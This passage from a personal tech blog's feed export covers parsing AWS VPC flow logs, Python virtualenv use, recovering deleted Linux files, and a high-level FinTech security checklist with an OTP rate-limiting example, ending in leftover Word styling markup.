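To see what the pattern above actually extracts without a Logstash install, here is an added example (not code from the original post or from Logstash). It expands the post's grok pattern with a small grok-to-regex translator covering the four macros the pattern uses (NONNEGINT and NOTSPACE copied from the logstash-patterns-core definitions; INT and NUMBER simplified) and runs it over constructed sample records, including a NODATA record that the pattern does not match, so unparsed lines are surfaced rather than silently dropped from a detection pipeline. The sample records and the REJECT count per destination are constructed for illustration.

```python
"""Parse AWS VPC flow-log records with the grok pattern from this post.

Added example, not code from the original post or from Logstash. The grok
macro definitions are simplified copies; the sample records are constructed.
"""
import re
from collections import Counter
from functools import lru_cache

# grok macros used by the pattern (logstash-patterns-core; INT/NUMBER simplified)
GROK_MACROS = {
    "NONNEGINT": r"\b(?:[0-9]+)\b",
    "INT": r"(?:[+-]?(?:[0-9]+))",
    "NUMBER": r"(?:[+-]?(?:[0-9]+(?:\.[0-9]+)?))",
    "NOTSPACE": r"\S+",
}

# The pattern from the post, verbatim.
VPC_FLOW_GROK = (
    "%{NONNEGINT:version} %{NONNEGINT:accountid} %{NOTSPACE:interface-id} "
    "%{NOTSPACE:srcaddr} %{NOTSPACE:dstaddr} %{NONNEGINT:srcport} "
    "%{NONNEGINT:dstport} %{NONNEGINT:protocol} %{NONNEGINT:packets} "
    "%{NONNEGINT:bytes} %{NONNEGINT:starttime} %{NONNEGINT:endtime} "
    "%{NOTSPACE:action} %{NOTSPACE:log-status}"
)

# Matches %{MACRO}, %{MACRO:field} or %{MACRO:field:int|float}
_GROK_REF = re.compile(r"%\{(\w+)(?::([\w-]+))?(?::(int|float))?\}")


@lru_cache(maxsize=None)
def grok_to_regex(pattern):
    """Translate a grok pattern into (compiled regex, {field: type or None})."""
    types = {}

    def expand(m):
        macro, field, typ = m.group(1), m.group(2), m.group(3)
        body = GROK_MACROS[macro]          # KeyError means an unknown macro
        if field is None:
            return "(?:%s)" % body
        types[field] = typ
        # Python group names cannot contain '-', so interface-id -> interface_id
        return "(?P<%s>%s)" % (field.replace("-", "_"), body)

    return re.compile("^" + _GROK_REF.sub(expand, pattern) + "$"), types


def parse_flow_log(line, pattern=VPC_FLOW_GROK):
    """Return the record as a dict keyed by grok field name, or None on mismatch."""
    regex, types = grok_to_regex(pattern)
    m = regex.match(line.strip())
    if m is None:
        return None
    record = {}
    for field, typ in types.items():
        value = m.group(field.replace("-", "_"))
        if typ == "int":
            value = int(value)
        elif typ == "float":
            value = float(value)
        record[field] = value
    return record


def rejected_by_destination(lines, pattern=VPC_FLOW_GROK):
    """Count REJECT records per (dstaddr, dstport); also return lines that did not parse."""
    counts, unparsed = Counter(), []
    for line in lines:
        record = parse_flow_log(line, pattern)
        if record is None:
            unparsed.append(line)
        elif record["action"] == "REJECT":
            counts[(record["dstaddr"], record["dstport"])] += 1
    return counts, unparsed


# Constructed sample records: the post's record, two more, and a NODATA record
# (AWS writes '-' for the address, port and counter fields of NODATA and
# SKIPDATA records, which NONNEGINT does not match).
SAMPLE_LINES = [
    "2 123456789010 eni-abc123de 172.31.9.69 172.31.9.12 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK",
    "2 123456789010 eni-abc123de 172.31.9.70 172.31.9.12 50122 3389 6 12 1200 1418530010 1418530070 REJECT OK",
    "2 123456789010 eni-abc123de 172.31.9.69 172.31.9.12 49762 22 6 40 8100 1418530010 1418530070 ACCEPT OK",
    "2 123456789010 eni-abc123de - - - - - - - 1418530010 1418530070 - NODATA",
]

if __name__ == "__main__":
    counts, unparsed = rejected_by_destination(SAMPLE_LINES)
    for (dst, port), n in counts.most_common():
        print("REJECT %s:%s x%d" % (dst, port, n))
    print("unparsed:", len(unparsed))
```

Appending <span style="font-family: Courier New, Courier, monospace;">:int</span> to a field (for example <span style="font-family: Courier New, Courier, monospace;">%{NONNEGINT:bytes:int}</span>) converts it the way grok's type suffix does; if NODATA/SKIPDATA records matter to you, use NOTSPACE for the port and counter fields or keep a fallback pattern for them.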
Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com4tag:blogger.com,1999:blog-1852980805947568568.post-84284775406075893152018-01-20T06:09:00.003+05:302018-01-20T06:38:28.881+05:30Working in or using Python virtualenv<br />
Install Python virtualenv on Ubuntu using the command below<br />
<span style="font-family: "courier new" , "courier" , monospace;">apt-get -y install python-virtualenv</span><br />
<br />
Create virtualenv<br />
<span style="font-family: "courier new" , "courier" , monospace;">$virtualenv test_env1</span><br />
New python executable in test_env1/bin/python<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">$. test_env1/bin/activate</span><br />
Or<br />
<span style="font-family: "courier new" , "courier" , monospace;">$source test_env1/bin/activate</span><br />
<br />
Exit virtualenv<br />
<span style="font-family: "courier new" , "courier" , monospace;">$deactivate</span><br />
<br />
Switch between virtualenvs (a virtualenvwrapper command, see below)<br />
<span style="font-family: "courier new" , "courier" , monospace;">$workon test_env2</span><br />
<br />
List all available virtualenvs (also from virtualenvwrapper)<br />
<span style="font-family: "courier new" , "courier" , monospace;">$workon</span><br />
<br />
<br />
virtualenvwrapper comes with a few handy commands; install it with<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">$pip install virtualenvwrapper</span><br />
<br />
virtualenvwrapper adds extra commands such as<br />
<span style="font-family: "courier new" , "courier" , monospace;">mkvirtualenv</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">cdvirtualenv</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">rmvirtualenv</span><br />
<div>
<br /></div>
Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com3tag:blogger.com,1999:blog-1852980805947568568.post-53174523226042954102017-12-23T02:49:00.000+05:302017-12-23T02:49:13.241+05:30Linux: Recovering files deleted using "rm -rf"<br />Removed a Python script file by accident. The following two methods worked for me in retrieving the file.<div>
<br /></div>
<div>
Trick 1:</div>
<div>
This was posted on askubuntu.com</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">$grep -a -B 40 -A 80 'string_from_file' /dev/sda1 > save_here.txt</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span><b>-A 80</b> save 80 lines after the match<br /><b>-B 40</b> save 40 lines before the match<br /><b>string_from_file</b> at least one unique string you remember from the deleted file<br /><b>save_here.txt </b> retrieved content is copied here; write it to a different filesystem than the one you are searching, so the output does not overwrite the freed blocks you are trying to recover<br /><br />Trick 2:</div>
<div>
<span style="font-family: Courier New, Courier, monospace;">$lsof | grep -i "/path/to/file"</span><br />progname <b>1234</b> user_name <b>44</b> 8,1 43219876 432890 /path/to/file <br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">$cp /proc/<b>1234</b>/fd/<b>44</b> /restore/file/tothis/path</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
Retrieved files might contain unrelated data, or a few lines might be out of order.</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<br /></div>
Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0tag:blogger.com,1999:blog-1852980805947568568.post-71805244254016415442017-10-17T02:41:00.003+05:302017-10-17T02:41:59.445+05:30FinTech, Mobile Applications and Vulnerabilities<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="mso-ansi-language: EN-US;">MOBILE APPLICATION VULNERABILITIES<o:p></o:p></span></b></div>
<div class="MsoNormal">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="mso-ansi-language: EN-US;">Reverse Engineering</span></b><span lang="EN-US" style="mso-ansi-language: EN-US;">: Applications published on Google Play or the Apple App Store can be reverse engineered by malicious users to create similar applications, so companies can lose their intellectual property.</span></div>
<div class="MsoNormal">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="mso-ansi-language: EN-US;">Insecure Data Storage</span></b><span lang="EN-US" style="mso-ansi-language: EN-US;">: FinTech-related applications store sensitive data such as personally identifiable information (PII), card data (PCI), health information, etc. Sensitive personal information saved on the mobile device should be encrypted.</span></div>
<div class="MsoNormal">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="mso-ansi-language: EN-US;">SSL Pinning bypass</span></b><span lang="EN-US" style="mso-ansi-language: EN-US;">: SSL Pinning will<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">One Time Password: OTP is used as a second level of authentication.</span></div>
<div class="MsoNormal" style="text-indent: 36.0pt;">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="mso-ansi-language: EN-US;">OTP Spamming</span></b><span lang="EN-US" style="mso-ansi-language: EN-US;">: OTP spamming is repeatedly requesting an API/URL that generates an OTP while supplying the victim's phone number as the mobile number. If there is no proper validation, an attacker can send many OTP SMSs to the victim's phone.</span></div>
<div class="MsoNormal" style="text-indent: 36.0pt;">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="mso-ansi-language: EN-US;">OTP Bypass</span></b><span lang="EN-US" style="mso-ansi-language: EN-US;">: <o:p></o:p></span></div>
<div class="MsoListParagraphCxSpFirst" style="margin-left: 90.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-US" style="mso-ansi-language: EN-US; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-fareast-font-family: Calibri; mso-hansi-font-family: Calibri;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="EN-US" style="mso-ansi-language: EN-US;">Modifying
checks: OTP validation can be bypassed by modifying checks in the request
payload or URI parameters<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 90.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-US" style="mso-ansi-language: EN-US; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-fareast-font-family: Calibri; mso-hansi-font-family: Calibri;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="EN-US" style="mso-ansi-language: EN-US;">Bypassing
SS7<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpLast" style="margin-left: 90.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-US" style="mso-ansi-language: EN-US; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-fareast-font-family: Calibri; mso-hansi-font-family: Calibri;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="EN-US" style="mso-ansi-language: EN-US;">Malicious mobile apps sniffing OTPs</span></div>
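The mitigation for the OTP spamming item above (and the "Ratelimiting Issues" item in the web section below), as an added example that is not code from the original post: a sliding-window rate limiter keyed on the normalised destination number, so an attacker rotating source IPs or changing the number's formatting still cannot flood one victim, plus a looser limit per requester IP. The request trace and the limits (3 OTPs per number and 10 per IP every 600 seconds) are constructed assumptions for illustration; the SMS send itself is stubbed.

```python
"""Rate-limit OTP delivery per destination number and per requester.

Added example, not code from the original post. The request trace at the
bottom is constructed sample data and the limits are illustrative.
"""
import time
from collections import defaultdict, deque


def normalise_phone(phone):
    """Keep only digits and a leading '+', so '+91 98765-43210' and
    '+919876543210' share one bucket; otherwise formatting variants would
    each get their own per-number allowance."""
    digits = "".join(ch for ch in phone if ch.isdigit())
    return ("+" if phone.strip().startswith("+") else "") + digits


class SlidingWindowLimiter:
    """Allow at most `limit` events per `window` seconds for each key."""

    def __init__(self, limit, window):
        self.limit = limit
        self.window = window
        self._events = defaultdict(deque)  # key -> timestamps of recent events

    def allow(self, key, now=None):
        now = time.monotonic() if now is None else now
        q = self._events[key]
        while q and now - q[0] >= self.window:
            q.popleft()                    # drop events outside the window
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


class OtpSender:
    """Front door of an OTP-generation endpoint (the SMS send is stubbed)."""

    def __init__(self, per_number=(3, 600), per_ip=(10, 600)):
        self.number_limiter = SlidingWindowLimiter(*per_number)
        self.ip_limiter = SlidingWindowLimiter(*per_ip)
        self.sent = []                     # (timestamp, number) pairs actually sent

    def request_otp(self, phone, client_ip, now=None):
        """Return 'sent', 'rejected:ip' or 'rejected:number'."""
        now = time.monotonic() if now is None else now
        number = normalise_phone(phone)
        if not self.ip_limiter.allow(client_ip, now):
            return "rejected:ip"
        if not self.number_limiter.allow(number, now):
            return "rejected:number"
        self.sent.append((now, number))    # the real service would send the SMS here
        return "sent"


# Constructed trace: (seconds since start, phone as typed, client IP). The
# first five requests target one number with varied formatting and source
# IPs; the last one arrives after the window has expired.
SAMPLE_REQUESTS = [
    (0,   "+91 98765 43210", "203.0.113.5"),
    (1,   "+919876543210",   "203.0.113.5"),
    (2,   "+91-98765-43210", "203.0.113.6"),
    (3,   "+919876543210",   "203.0.113.7"),
    (4,   "+919876543210",   "203.0.113.8"),
    (700, "+919876543210",   "198.51.100.9"),
]


def replay(requests):
    """Feed a request trace through one OtpSender and return the decisions."""
    sender = OtpSender()
    return [sender.request_otp(phone, ip, now=t) for t, phone, ip in requests]


if __name__ == "__main__":
    for req, decision in zip(SAMPLE_REQUESTS, replay(SAMPLE_REQUESTS)):
        print("t=%4d %-18s %-13s -> %s" % (req + (decision,)))
```

In a deployment with several application instances the limiter state belongs in shared storage rather than in process memory, and the endpoint's response should look the same whether the request was sent or rejected, so the limiter does not become an oracle for which numbers are registered.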
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="mso-ansi-language: EN-US;">WEB APPLICATION VULNERABILITIES<o:p></o:p></span></b></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">All OWASP
Top 10 or SANS Top 25 Vulnerabilities will be applicable.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- Cross Site Scripting (XSS): If user input is not validated, attacker-supplied JavaScript can execute in other users' browsers, which can lead to cookie theft, redirection to malicious websites, DDoS attacks on other sites, etc.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- SQL
Injection: Improper input validation might lead to SQL Injection.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- Privilege Escalation: If authorization is not enforced properly, one user can access other users' data.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- Authentication
bypass<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><span style="mso-tab-count: 1;"> </span>SQL Injection<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><span style="mso-tab-count: 1;"> </span>Session ID Guessing<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><span style="mso-tab-count: 1;"> </span>Cookie values <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- Command
Execution: Improper input validation might lead to OS command execution<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- Serialization/Deserialization: Untrusted serialized data is interpreted as code because of improper validation. This can lead to code execution in Java, PHP, Python, etc.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- CSRF<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- WAF
Bypass<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- Rate limiting issues on</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><span style="mso-tab-count: 1;"> </span>Important APIs</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><span style="mso-tab-count: 1;"> </span>Forgot/Reset Password<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><span style="mso-tab-count: 1;"> </span>Login page<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><span style="mso-tab-count: 1;"> </span>Other important/sensitive APIs</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- XXE (XML
External Entity) Attack<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- SSRF
(Server Side Request Forgery)<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- JSON
Injection<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- DoS/DDoS
(Layer 3, Layer 4 and Layer 7 attacks)<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="mso-ansi-language: EN-US;">AWS INFRA<o:p></o:p></span></b></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- Public S3 buckets: the files in them are readable by anyone</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- Public
EBS Volumes: Might have sensitive information like SSH Keys, Server Keys,
passwords etc.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- No Multi
Factor Authentication (MFA, 2FA) to AWS<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- Root
logins<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- Token
Disclosure<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><span style="mso-tab-count: 1;"> </span>Slack<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><span style="mso-tab-count: 1;"> </span>Git<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="mso-ansi-language: EN-US;">MISCELLANEOUS<span style="mso-tab-count: 1;"> </span><o:p></o:p></span></b></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Cryptocurrency-based exploitation in the future</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Sub-domain
takeover<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Vulnerabilities
in protocols<o:p></o:p></span></div>
<!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="382">
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Level 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Level 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Level 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Level 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Level 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Level 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Level 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Level 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Level 9"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
